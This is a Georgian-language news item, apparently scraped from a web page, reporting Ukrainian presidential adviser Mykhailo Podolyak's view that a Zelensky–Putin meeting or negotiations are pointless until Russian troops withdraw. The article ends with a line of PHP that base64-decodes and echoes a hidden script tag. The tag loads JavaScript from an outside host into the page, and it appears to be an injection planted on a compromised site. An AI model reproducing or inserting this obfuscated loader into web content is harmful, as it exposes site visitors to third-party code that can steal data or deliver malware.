celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის ოფისის ხელმძღვანელის მრჩეველი მიხაილ პოდოლიაკი აცხადებს, რომ ვოლოდიმირ ზელენსკისა და ვლადიმერ პუტინის შეხვედრასა და მოლაპარაკებების პროცესს ახლა აზრი არ აქვს.
 
ამის შესახებ ინფორმაციას უკრაინული გამოცემა „უკრაინსკაია პრავდა“ ავრცელებს.
 
„მოკლედ რომ ვთქვათ, ახლა თავად მოლაპარაკებების პროცესს და პრეზიდენტების პირად შეხვედრას აბსოლუტურად არანაირი აზრი არ აქვს. პირველ რიგში, რუსეთი ჯერ კიდევ მიიჩნევს, რომ მას აქვს საკმარისი რესურსი, რომ დააფიქსიროს რამე შედეგები. მეორე მხრივ, ნებისმიერი შეხვედრა დღეს – ეს არის ტრადიციული რუსული ისტორიის თამაში: ვაფიქსირებთ სტატუსკვოს, ვცეკვავთ „ცრუ მინსკის ცეკვებს“, ვიწყებთ ესკალაციის ახალ ეტაპს, მესამე – რუსეთმა უნდა აგოს პასუხი მასშტაბურ დანაშაულებებზე და არ დაიმალოს დაუსჯელობის უკან. ამიტომ, ომი უნდა მივიდეს ერთადერთ შესაძლო ფინალამდე. ამიტომ, გასაგებია, რომ სწორედ ახლა ორმხრივი შეხვედრის თემა დღის წესრიგში არ არის. ჩვენ საერთოდ არ გვაინტერესებს შეხვედრა შეხვედრისთვის ან მოლაპარაკებების ბანალური რუსული სცენარი. ჩვენ გვაინტერესებს ოკუპირებული ტერიტორიების გათავისუფლება, რუსეთის არსებითი ტაქტიკური მარცხები, სავალდებულო მასშტაბური იურიდიული პროცესები“, – განაცხადა მიხაილ პოდოლიაკმა.
 
​ამასთან, უკრაინის პრეზიდენტის ადმინისტრაციის ხელმძღვანელის მრჩეველმა აღნიშნა, რომ რუსეთის და უკრაინის პრეზიდენტების შეხვედრა შესაძლებელია, თუ მას წინ უძღვება უკრაინიდან რუსეთის ჯარების სრული გაყვანა, ხოლო მოლაპარაკებების თემა იქნება „ომის შემდგომი ცხოვრების განხილვა, რეპარაციების, ზარალის კომპენსაციის მოცულობის და დამნაშავეების გადაცემის საკითხების ჩათვლით“.
 
413
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");